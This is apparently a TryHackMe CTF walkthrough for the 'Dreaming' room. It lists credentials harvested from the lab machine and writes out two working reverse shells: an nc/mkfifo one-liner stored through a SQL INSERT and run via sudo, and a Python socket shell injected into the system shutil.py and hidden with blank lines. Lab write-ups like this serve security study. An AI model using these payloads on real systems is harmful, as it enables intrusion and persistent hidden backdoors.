> For the complete documentation index, see [llms.txt](https://kyou00.gitbook.io/xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kyou00.gitbook.io/xyz/tryhackme/view/dreaming.md).

# Dreaming

<figure><img src="/files/bFDpEI9nd7CcAuj89RQi" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/vZnEsOLMUa8m9d7fDYrs" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ZpVsf4q1GrhroxcqF4zn" alt=""><figcaption></figcaption></figure>

We can see here that port 3306 is running which is mysql database

<figure><img src="/files/PUkhKxmvYG9GClNwG0GL" alt=""><figcaption></figcaption></figure>

Then after we viewed the "test.py" we can grab some credentials&#x20;

```
login.php
lucien
HeyLucien#@1999!
```

<figure><img src="/files/7YDwAtI25klFoUWNlhM4" alt=""><figcaption></figcaption></figure>

```
mysql
DB_USER = "death"
DB_PASS = "#redacted"
DB_NAME = "library"
```

<figure><img src="/files/pGNiVqGRFFtrI2i3cyV6" alt=""><figcaption></figcaption></figure>

```
ssh lucien@IP
HeyLucien#@1999!
```

<figure><img src="/files/JJeK7e4vFPPwceSFmufF" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/eZPAQMx72ax3L1oVvAJX" alt=""><figcaption></figcaption></figure>

```
mysql -u lucien -p
lucien42DBPASSWORD
```

<figure><img src="/files/uAk6gKgMUT4A0pcv5Zur" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/XUvCaSel1ujgZfm6BAkK" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/UmrlUdnlELxZhsceottz" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/OHKgVxhoGWEPOTcelF99" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/B9baA5pDs78uyUIoasPd" alt=""><figcaption></figcaption></figure>

But remember that the code in the "getDreams.py" has a vulnerability that is doesn't filter out some key input that is malicious.

<figure><img src="/files/8VrWWUscR7cdfiWPVjTD" alt=""><figcaption></figcaption></figure>

Now we will see again the contents of "dreams" table from the "library" database.

<figure><img src="/files/bF6d83AoqiIU6NI2W4SN" alt=""><figcaption></figcaption></figure>

Thus conclude that we can insert the reverse shell into the database.

{% code overflow="wrap" %}

```
INSERT INTO dreams (dreamer, dream) VALUES ('<anything>', '<Reverse_shell>');

INSERT INTO dreams (dreamer, dream) VALUES ('tryingtobehacker', 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.193.229 4444 >/tmp/f');
```

{% endcode %}

<figure><img src="/files/N4ZIpJnFv6cA4r84GCBm" alt=""><figcaption></figcaption></figure>

As we run that command as user death it will excecute the reverse shell and we will receive the connection from it

```
sudo -u death /usr/bin/python3 /home/death/getDreams.py
```

<figure><img src="/files/VpvmgsBLHLv9VtfOeuCH" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/8Kf0bnLifirO4n4aCT8N" alt=""><figcaption></figcaption></figure>

As we navigate to morpheus user we can see "restore.py" which is a python script

<figure><img src="/files/WQ5ebV4bGmpfjZ7h3pxv" alt=""><figcaption></figcaption></figure>

As we go see the shutil.py from the directory /usr/lib/python3.8. We can see here that we can modify the shutil.py

```
cd /usr/lib/python3.8
```

<figure><img src="/files/ntC54KjozuHb5JIcAZpS" alt=""><figcaption></figcaption></figure>

This is the unedited shutil.py script&#x20;

<figure><img src="/files/q9g734CFqmmGxQORGmeg" alt=""><figcaption></figcaption></figure>

Now we will inject our reverse shell into the shutil.py&#x20;

PS. Just press enter multiple times for us to insert our malicious code

```
import socket,subprocess,os;
import pty;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.9.193.229",5555));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")
```

<figure><img src="/files/vvWhExb7bdBRu2VARObB" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/yoNoRb9HBj2qJkVR8Na7" alt=""><figcaption></figcaption></figure>
